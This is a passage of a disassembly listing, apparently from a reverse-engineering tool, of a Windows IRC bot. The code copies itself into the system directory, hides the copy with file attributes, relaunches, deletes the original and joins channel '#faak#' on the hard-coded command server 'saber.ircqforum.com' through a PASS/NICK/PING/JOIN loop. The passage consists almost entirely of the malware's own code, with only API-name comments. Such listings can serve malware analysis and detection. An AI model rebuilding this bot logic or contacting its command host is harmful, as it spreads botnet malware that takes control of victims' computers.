loc_40E5B8: ; CODE XREF: sub_40E4B7+35�j
; sub_40E4B7+87�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5BF: ; CODE XREF: sub_40E4B7+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5C6: ; CODE XREF: sub_40E4B7+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5CD: ; CODE XREF: sub_40E4B7+C2�j
; sub_40E4B7+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_40E5D9
; ---------------------------------------------------------------------------
loc_40E5D4: ; CODE XREF: sub_40E4B7+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_40E5D9: ; CODE XREF: sub_40E4B7+40�j
; sub_40E4B7+4A�j ...
push offset dword_43F408
call sub_4172B0
pop ecx
mov eax, offset dword_43F408
pop ecx
retn
sub_40E4B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E5EB proc near ; CODE XREF: sub_40EE72+2231�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_4199B9
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call ds:dword_424154 ;; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_4199B9
lea eax, [ebp+var_718]
push eax
call sub_41999C
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call ds:dword_43ADA8
test eax, eax
jnz short loc_40E67B
mov esi, offset dword_43F204
push offset dword_42F568
push esi
call sub_4172B0
pop ecx
pop ecx
jmp short loc_40E6A4
; ---------------------------------------------------------------------------
loc_40E67B: ; CODE XREF: sub_40E5EB+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_40E4B7
pop ecx
mov esi, offset dword_43F204
push eax
push offset dword_42F530
push esi
call sub_4172B0
add esp, 14h
loc_40E6A4: ; CODE XREF: sub_40E5EB+8E�j
mov eax, esi
pop esi
leave
retn
sub_40E5EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6A9 proc near ; CODE XREF: _0:00419CAD�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
var_6F4 = byte ptr -6F4h
var_5F4 = byte ptr -5F4h
var_4F0 = byte ptr -4F0h
var_3F0 = byte ptr -3F0h
var_2EC = byte ptr -2ECh
var_1E8 = byte ptr -1E8h
var_E4 = byte ptr -0E4h
var_64 = dword ptr -64h
var_58 = dword ptr -58h
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_40D3A5
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_424058
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ds:dword_4CD5F0, eax
call esi ; GetTickCount
push eax
call sub_417302
pop ecx
call sub_40981F
push 2
call ds:dword_43AE44 ;; SetErrorMode
push 7530h
push offset aBotid ; "botid"
push ebx
push ebx
call ds:dword_424164 ;; CreateMutexA
push eax
call ds:dword_424088 ;; WaitForSingleObject
cmp eax, 102h
jnz short loc_40E726
push 1
call ds:off_42414C
loc_40E726: ; CODE XREF: sub_40E6A9+73�j
lea eax, [ebp+var_884]
push eax
push 202h
call ds:dword_43AD10 ;; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40EB89
cmp [ebp+var_884], 2
jnz loc_40EB83
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_40EB83
mov esi, 104h
lea eax, [ebp+var_3F0]
push esi
push eax
call ds:dword_424068 ;; GetSystemDirectoryA
lea eax, [ebp+var_2EC]
push esi
push eax
push ebx
call ds:off_424100
push eax
call ds:off_424094
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push ebx
lea eax, [ebp+var_2EC]
push ebx
push eax
call sub_4192B8
add esp, 14h
lea eax, [ebp+var_4F0]
push eax
lea eax, [ebp+var_6F4]
push eax
push offset aSS_2 ; "%s%s"
lea eax, [ebp+var_5F4]
push esi
push eax
call sub_41782A
lea eax, [ebp+var_3F0]
push eax
lea eax, [ebp+var_2EC]
push eax
call sub_417880
add esp, 1Ch
test eax, eax
jnz loc_40E98C
cmp ds:dword_42F5BC, ebx
mov esi, offset byte_42F674
jz short loc_40E824
push esi
xor edi, edi
call sub_417AB0
sub eax, 4
pop ecx
jz short loc_40E824
loc_40E801: ; CODE XREF: sub_40E6A9+179�j
call sub_41730C
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov ds:byte_42F674[edi], dl
inc edi
call sub_417AB0
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_40E801
loc_40E824: ; CODE XREF: sub_40E6A9+148�j
; sub_40E6A9+156�j
lea eax, [ebp+var_3F0]
push esi
push eax
lea eax, [ebp+var_1E8]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_4172B0
add esp, 10h
lea eax, [ebp+var_1E8]
push eax
call ds:off_4240A8
cmp eax, 0FFFFFFFFh
jz short loc_40E864
lea eax, [ebp+var_1E8]
push 80h
push eax
call ds:dword_424128 ;; SetFileAttributesA
loc_40E864: ; CODE XREF: sub_40E6A9+1A7�j
mov esi, ds:dword_424160
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
xor edi, edi
push eax
loc_40E87B: ; CODE XREF: sub_40E6A9+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_40E8B4
call ds:dword_42408C ;; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40E8B4
cmp eax, 20h
jz short loc_40E895
cmp eax, 5
jnz short loc_40E8B4
loc_40E895: ; CODE XREF: sub_40E6A9+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_424064 ;; Sleep
lea eax, [ebp+var_1E8]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
jmp short loc_40E87B
; ---------------------------------------------------------------------------
loc_40E8B4: ; CODE XREF: sub_40E6A9+1D6�j
; sub_40E6A9+1E0�j ...
lea eax, [ebp+var_1E8]
push eax
call sub_40AB7C
pop ecx
lea eax, [ebp+var_1E8]
push 7
push eax
call ds:dword_424128 ;; SetFileAttributesA
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_417330
push 44h
lea eax, [ebp+var_64]
pop esi
push esi
push ebx
push eax
call sub_417330
add esp, 18h
mov [ebp+var_64], esi
mov [ebp+var_58], offset byte_436EDC
mov [ebp+var_34], bx
push 1
pop esi
mov [ebp+var_38], esi
call ds:dword_42415C ;; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_4240FC ;; OpenProcess
lea ecx, [ebp+var_2EC]
push ecx
push eax
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_988]
push offset dword_42F7EC
push eax
call sub_4172B0
add esp, 14h
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_3F0]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+var_1E8]
push eax
call ds:dword_424120 ;; CreateProcessA
test eax, eax
jz short loc_40E98C
push 0C8h
call ds:dword_424064 ;; Sleep
push [ebp+var_1C]
mov esi, ds:off_424078
call esi ; sub_4E03D5
push [ebp+var_18]
call esi ; sub_4E03D5
call ds:dword_43ACF8 ;; WSACleanup
push ebx
call ds:off_42414C
loc_40E98C: ; CODE XREF: sub_40E6A9+137�j
; sub_40E6A9+2B9�j
cmp ds:dword_4CD9D0, 2
jle short loc_40E9D8
mov eax, ds:dword_4CD9D4
push dword ptr [eax+4]
call sub_41781F
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_424088 ;; WaitForSingleObject
push esi
call ds:off_424078
mov eax, ds:dword_4CD9D4
cmp [eax+8], ebx
jz short loc_40E9D8
push 7D0h
call ds:dword_424064 ;; Sleep
mov eax, ds:dword_4CD9D4
push dword ptr [eax+8]
call ds:dword_424158 ;; DeleteFileA
loc_40E9D8: ; CODE XREF: sub_40E6A9+2EA�j
; sub_40E6A9+314�j
cmp ds:dword_42F5C0, ebx
jz short loc_40E9F5
cmp ds:dword_43AE68, ebx
jnz short loc_40E9F5
lea eax, [ebp+var_5F4]
push eax
call sub_40C1AE
pop ecx
loc_40E9F5: ; CODE XREF: sub_40E6A9+335�j
; sub_40E6A9+33D�j
lea eax, [ebp+var_E4]
push offset dword_42F7C4
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_E4]
push ebx
push eax
call sub_416D5C
lea eax, [ebp+var_E4]
push eax
call sub_40BF6D
push 0B80h
push ebx
push offset dword_43FA70
call sub_417330
call sub_41730C
push 7Fh
push offset aSaber_ircqforu ; "saber.ircqforum.com"
push offset dword_4CD5FC
mov ds:dword_4CD770, ebx
call sub_418C10
mov eax, ds:dword_42F5A0
push 3Fh
mov edi, offset dword_4CD67C
push offset aFaak ; "#faak#"
push edi
mov ds:dword_4CD74C, eax
call sub_418C10
push 3Fh
mov esi, offset dword_4CD6BC
push offset aSaad_ ; "saad."
push esi
call sub_418C10
add esp, 48h
mov ds:dword_4CD750, ebx
loc_40EA83: ; CODE XREF: sub_40E6A9+480�j
; sub_40E6A9+48B�j ...
mov [ebp+var_4], ebx
loc_40EA86: ; CODE XREF: sub_40E6A9+434�j
cmp ds:dword_43AE80, ebx
jnz short loc_40EAA4
lea eax, [ebp+var_20]
push ebx
push eax
call ds:dword_43ACDC ;; InternetGetConnectedState
test eax, eax
jnz short loc_40EAA4
push 7530h
jmp short loc_40EAD0
; ---------------------------------------------------------------------------
loc_40EAA4: ; CODE XREF: sub_40E6A9+3E3�j
; sub_40E6A9+3F2�j
push offset dword_4CD5F8
mov ds:dword_4CD76C, ebx
call sub_40EB92
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40EB7E
cmp ds:dword_4CD76C, ebx
jz short loc_40EACB
dec [ebp+var_4]
loc_40EACB: ; CODE XREF: sub_40E6A9+41D�j
push 0BB8h
loc_40EAD0: ; CODE XREF: sub_40E6A9+3F9�j
call ds:dword_424064 ;; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40EA86
cmp [ebp+var_8], 2
jz loc_40EB7E
cmp [ebp+var_C], ebx
jz short loc_40EB2E
push 7Fh
push offset aSaber_ircqforu ; "saber.ircqforum.com"
push offset dword_4CD5FC
call sub_418C10
mov eax, ds:dword_42F5A0
push 3Fh
push offset aFaak ; "#faak#"
push edi
mov ds:dword_4CD74C, eax
call sub_418C10
push 3Fh
push offset aSaad_ ; "saad."
push esi
call sub_418C10
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40EA83
; ---------------------------------------------------------------------------
loc_40EB2E: ; CODE XREF: sub_40E6A9+443�j
cmp ds:byte_42F650, bl
jz loc_40EA83
push 7Fh
push offset byte_42F650
push offset dword_4CD5FC
call sub_418C10
mov eax, ds:dword_42F5A4
push 3Fh
push offset aFaak_0 ; "#faak#"
push edi
mov ds:dword_4CD74C, eax
call sub_418C10
push 3Fh
push offset aSaad__0 ; "saad."
push esi
call sub_418C10
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40EA83
; ---------------------------------------------------------------------------
loc_40EB7E: ; CODE XREF: sub_40E6A9+411�j
; sub_40E6A9+43A�j
call sub_416F25
loc_40EB83: ; CODE XREF: sub_40E6A9+A1�j
; sub_40E6A9+B1�j
call ds:dword_43ACF8 ;; WSACleanup
loc_40EB89: ; CODE XREF: sub_40E6A9+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40E6A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB92 proc near ; CODE XREF: sub_40E6A9+406�p
; DATA XREF: sub_40EE72+3B0C�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_40EBB7: ; CODE XREF: sub_40EB92+E6�j
; sub_40EB92+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call ds:dword_43AD98 ;; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40ADCA
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40ECE4
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_417330
push 0
lea eax, [ebp+var_2C]
push ds:dword_4CD760
push ds:dword_42F5CC
push eax
call sub_415D01
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_440808
push edi
push eax
call sub_418C10
add esp, 28h
push 6
push 1
push 2
call ds:dword_43AE18 ;; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov ds:dword_4407FC[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EC7D
push esi
call ds:dword_43AE30 ;; closesocket
call sub_40ADF3
push 7D0h
loc_40EC72: ; CODE XREF: sub_40EB92+146�j
call ds:dword_424064 ;; Sleep
jmp loc_40EBB7
; ---------------------------------------------------------------------------
loc_40EC7D: ; CODE XREF: sub_40EB92+CD�j
lea eax, [ebp+var_18C]
push eax
push offset dword_42F7F8
call sub_40BFE1
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40ECFA
add esp, 28h
mov edi, eax
push esi
call ds:dword_43AE30 ;; closesocket
test edi, edi
jz loc_40EBB7
cmp edi, 1
jnz short loc_40ECDA
push 0DBBA0h
jmp short loc_40EC72
; ---------------------------------------------------------------------------
loc_40ECDA: ; CODE XREF: sub_40EB92+13F�j
cmp edi, 2
jz short loc_40ECE8
jmp loc_40EBB7
; ---------------------------------------------------------------------------
loc_40ECE4: ; CODE XREF: sub_40EB92+5A�j
xor eax, eax
jmp short loc_40ECF4
; ---------------------------------------------------------------------------
loc_40ECE8: ; CODE XREF: sub_40EB92+14B�j
push [ebp+var_34]
call sub_417078
pop ecx
push 2
pop eax
loc_40ECF4: ; CODE XREF: sub_40EB92+154�j
pop edi
pop esi
leave
retn 4
sub_40EB92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECFA proc near ; CODE XREF: sub_40EB92+123�p
var_1A10 = byte ptr -1A10h
var_A10 = byte ptr -0A10h
var_240 = byte ptr -240h
var_1A0 = byte ptr -1A0h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A10h
call sub_417B30
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+var_1A0]
pop ecx
loc_40ED18: ; CODE XREF: sub_40ECFA+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_40ED18
cmp ds:byte_4CD768, bl
jz short loc_40ED3F
push offset byte_4CD768
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_40D633
add esp, 0Ch
loc_40ED3F: ; CODE XREF: sub_40ECFA+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_415D01
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_4172B0
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_40EDA9
push [ebp+arg_0]
call ds:dword_43AE30 ;; closesocket
push 1388h
call ds:dword_424064 ;; Sleep
loc_40EDA2: ; CODE XREF: sub_40ECFA+D9�j
; sub_40ECFA+153�j
xor eax, eax
loc_40EDA4: ; CODE XREF: sub_40ECFA+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EDA9: ; CODE XREF: sub_40ECFA+92�j
; sub_40ECFA+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A10]
push esi
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_1A10]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_43ADB0 ;; recv
test eax, eax
jle short loc_40EDA2
lea eax, [ebp+var_A10]
push eax
lea eax, [ebp+var_1A10]
push eax
call sub_40A868
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_40EDA9
lea edi, [ebp+var_A10]
loc_40EDFA: ; CODE XREF: sub_40ECFA+165�j
push 1
pop esi
loc_40EDFD: ; CODE XREF: sub_40ECFA+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_1A0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_40EE72
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40EE40
push 7D0h
call ds:dword_424064 ;; Sleep
jmp short loc_40EDFD
; ---------------------------------------------------------------------------
loc_40EE40: ; CODE XREF: sub_40ECFA+137�j
cmp esi, 0FFFFFFFDh
jz short loc_40EE6A
cmp esi, 0FFFFFFFEh
jz short loc_40EE66
cmp esi, 0FFFFFFFFh
jz loc_40EDA2
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_40EDFA
jmp loc_40EDA9
; ---------------------------------------------------------------------------
loc_40EE66: ; CODE XREF: sub_40ECFA+14E�j
push 1
jmp short loc_40EE6C
; ---------------------------------------------------------------------------
loc_40EE6A: ; CODE XREF: sub_40ECFA+149�j
push 2
loc_40EE6C: ; CODE XREF: sub_40ECFA+16E�j
pop eax
jmp loc_40EDA4
sub_40ECFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE72 proc near ; CODE XREF: sub_40ECFA+12A�p
var_15B0 = byte ptr -15B0h
var_11B0 = byte ptr -11B0h
var_FB0 = byte ptr -0FB0h
var_DB0 = byte ptr -0DB0h
var_CB0 = byte ptr -0CB0h
var_CAC = byte ptr -0CACh
var_BAC = byte ptr -0BACh
var_BA8 = byte ptr -0BA8h
var_AA8 = byte ptr -0AA8h
var_A28 = byte ptr -0A28h
var_9C7 = byte ptr -9C7h
var_9C6 = byte ptr -9C6h
var_9C4 = byte ptr -9C4h
var_9C3 = byte ptr -9C3h
var_9BA = byte ptr -9BAh
var_9B8 = byte ptr -9B8h
var_9B6 = byte ptr -9B6h
var_9B5 = byte ptr -9B5h
var_928 = byte ptr -928h
var_90C = dword ptr -90Ch
var_908 = byte ptr -908h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
var_7FC = byte ptr -7FCh
var_7F8 = dword ptr -7F8h
var_7F4 = byte ptr -7F4h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = byte ptr -7E8h
var_780 = byte ptr -780h
var_774 = byte ptr -774h
var_770 = dword ptr -770h
var_76C = byte ptr -76Ch
var_768 = byte ptr -768h
var_75C = byte ptr -75Ch
var_73C = dword ptr -73Ch
var_738 = byte ptr -738h
var_710 = dword ptr -710h
var_708 = byte ptr -708h
var_6FC = dword ptr -6FCh
var_6F8 = byte ptr -6F8h
var_6F4 = byte ptr -6F4h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_6E8 = byte ptr -6E8h
var_6B8 = byte ptr -6B8h
var_681 = byte ptr -681h
var_680 = byte ptr -680h
var_678 = byte ptr -678h
var_670 = byte ptr -670h
var_66C = byte ptr -66Ch
var_668 = byte ptr -668h
var_5F8 = byte ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_570 = dword ptr -570h
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = byte ptr -55Ch
var_50C = dword ptr -50Ch
var_508 = byte ptr -508h
var_504 = dword ptr -504h
var_500 = byte ptr -500h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = byte ptr -4E8h
var_4C0 = byte ptr -4C0h
var_4A0 = dword ptr -4A0h
var_488 = byte ptr -488h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = dword ptr -474h
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = byte ptr -45Ch
var_458 = byte ptr -458h
var_444 = byte ptr -444h
var_434 = byte ptr -434h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_40C = dword ptr -40Ch
var_408 = byte ptr -408h
var_3FC = byte ptr -3FCh
var_3F8 = byte ptr -3F8h
var_3D8 = byte ptr -3D8h
var_3B4 = byte ptr -3B4h
var_398 = byte ptr -398h
var_388 = byte ptr -388h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2EC = word ptr -2ECh
var_2EA = word ptr -2EAh
var_2E8 = dword ptr -2E8h
var_2DC = byte ptr -2DCh
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 15B0h
call sub_417B30
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
mov [ebp+var_C0], 3
mov [ebp+var_10], ebx
mov [ebp+var_AC], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_DC], ebx
call sub_417330
push 1Bh
lea eax, [ebp+var_928]
push [ebp+arg_10]
push eax
call sub_418C10
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_40F239
push esi
lea eax, [ebp+var_FB0]
push ebx
push eax
call sub_417330
dec esi
lea eax, [ebp+var_FB0]
push esi
push [ebp+arg_0]
push eax
call sub_418C10
lea eax, [ebp+var_FB0]
push offset asc_432E84 ; " :"
push eax
call sub_417880
mov [ebp+var_C], eax
lea eax, [ebp+var_FB0]
push esi
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_418C10
mov esi, offset asc_42A3B4 ; " "
lea eax, [ebp+var_11B0]
push esi
push eax
call sub_418B6E
add esp, 34h
mov [ebp+var_94], eax
lea edi, [ebp+var_90]
mov [ebp+var_BC], 1Fh
loc_40EF45: ; CODE XREF: sub_40EE72+E7�j
push esi
push ebx
call sub_418B6E
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_BC]
pop ecx
jnz short loc_40EF45
mov esi, [ebp+var_94]
cmp esi, ebx
jz loc_40F239
cmp [ebp+var_90], ebx
jz loc_40F239
push 100h
lea eax, [ebp+var_A28]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea ecx, [ebp+var_18]
push 1Fh
pop edx
push 1
pop edi
loc_40EF93: ; CODE XREF: sub_40EE72+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_40EFBF
cmp byte ptr [eax], 2Dh
jnz short loc_40EFC7
cmp [eax+2], bl
jnz short loc_40EFC7
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_A28], 1
mov esi, [ebp+var_94]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_40EFBF: ; CODE XREF: sub_40EE72+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_40EF93
loc_40EFC7: ; CODE XREF: sub_40EE72+12A�j
; sub_40EE72+12F�j
cmp [ebp+var_9B5], bl
jz short loc_40EFD2
mov [ebp+var_8], edi
loc_40EFD2: ; CODE XREF: sub_40EE72+15B�j
cmp [ebp+var_9BA], bl
jz short loc_40EFE0
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_40EFE0: ; CODE XREF: sub_40EE72+166�j
cmp byte ptr [esi], 0Ah
jz short loc_40F01A
push 7Fh
lea eax, [ebp+var_AA8]
push esi
push eax
call sub_418C10
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_D8]
push eax
call sub_418C10
lea eax, [ebp+var_D8]
push offset asc_432E80 ; "!"
push eax
call sub_418B6E
add esp, 20h
loc_40F01A: ; CODE XREF: sub_40EE72+171�j
push esi
push offset aPing ; "PING"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F06B
push [ebp+var_90]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_40D633
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40F10F
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
jmp loc_40F10F
; ---------------------------------------------------------------------------
loc_40F06B: ; CODE XREF: sub_40EE72+1B7�j
mov esi, [ebp+var_90]
push esi
push offset a001 ; "001"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4150D3
push esi
push offset a005 ; "005"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_4150D3
push esi
push offset a302 ; "302"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F0D3
push offset a@ ; "@"
push [ebp+var_88]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40F10F
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_418C10
jmp short loc_40F10C
; ---------------------------------------------------------------------------
loc_40F0D3: ; CODE XREF: sub_40EE72+238�j
push esi
push offset a433 ; "433"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F116
push ebx
push ds:dword_4CD760
push ds:dword_42F5CC
push [ebp+arg_10]
call sub_415D01
add esp, 10h
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40D633
loc_40F10C: ; CODE XREF: sub_40EE72+25F�j
add esp, 0Ch
loc_40F10F: ; CODE XREF: sub_40EE72+1D8�j
; sub_40EE72+1F4�j ...
mov eax, edi
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_40F116: ; CODE XREF: sub_40EE72+270�j
mov esi, [ebp+arg_18]
mov [ebp+var_BC], 2
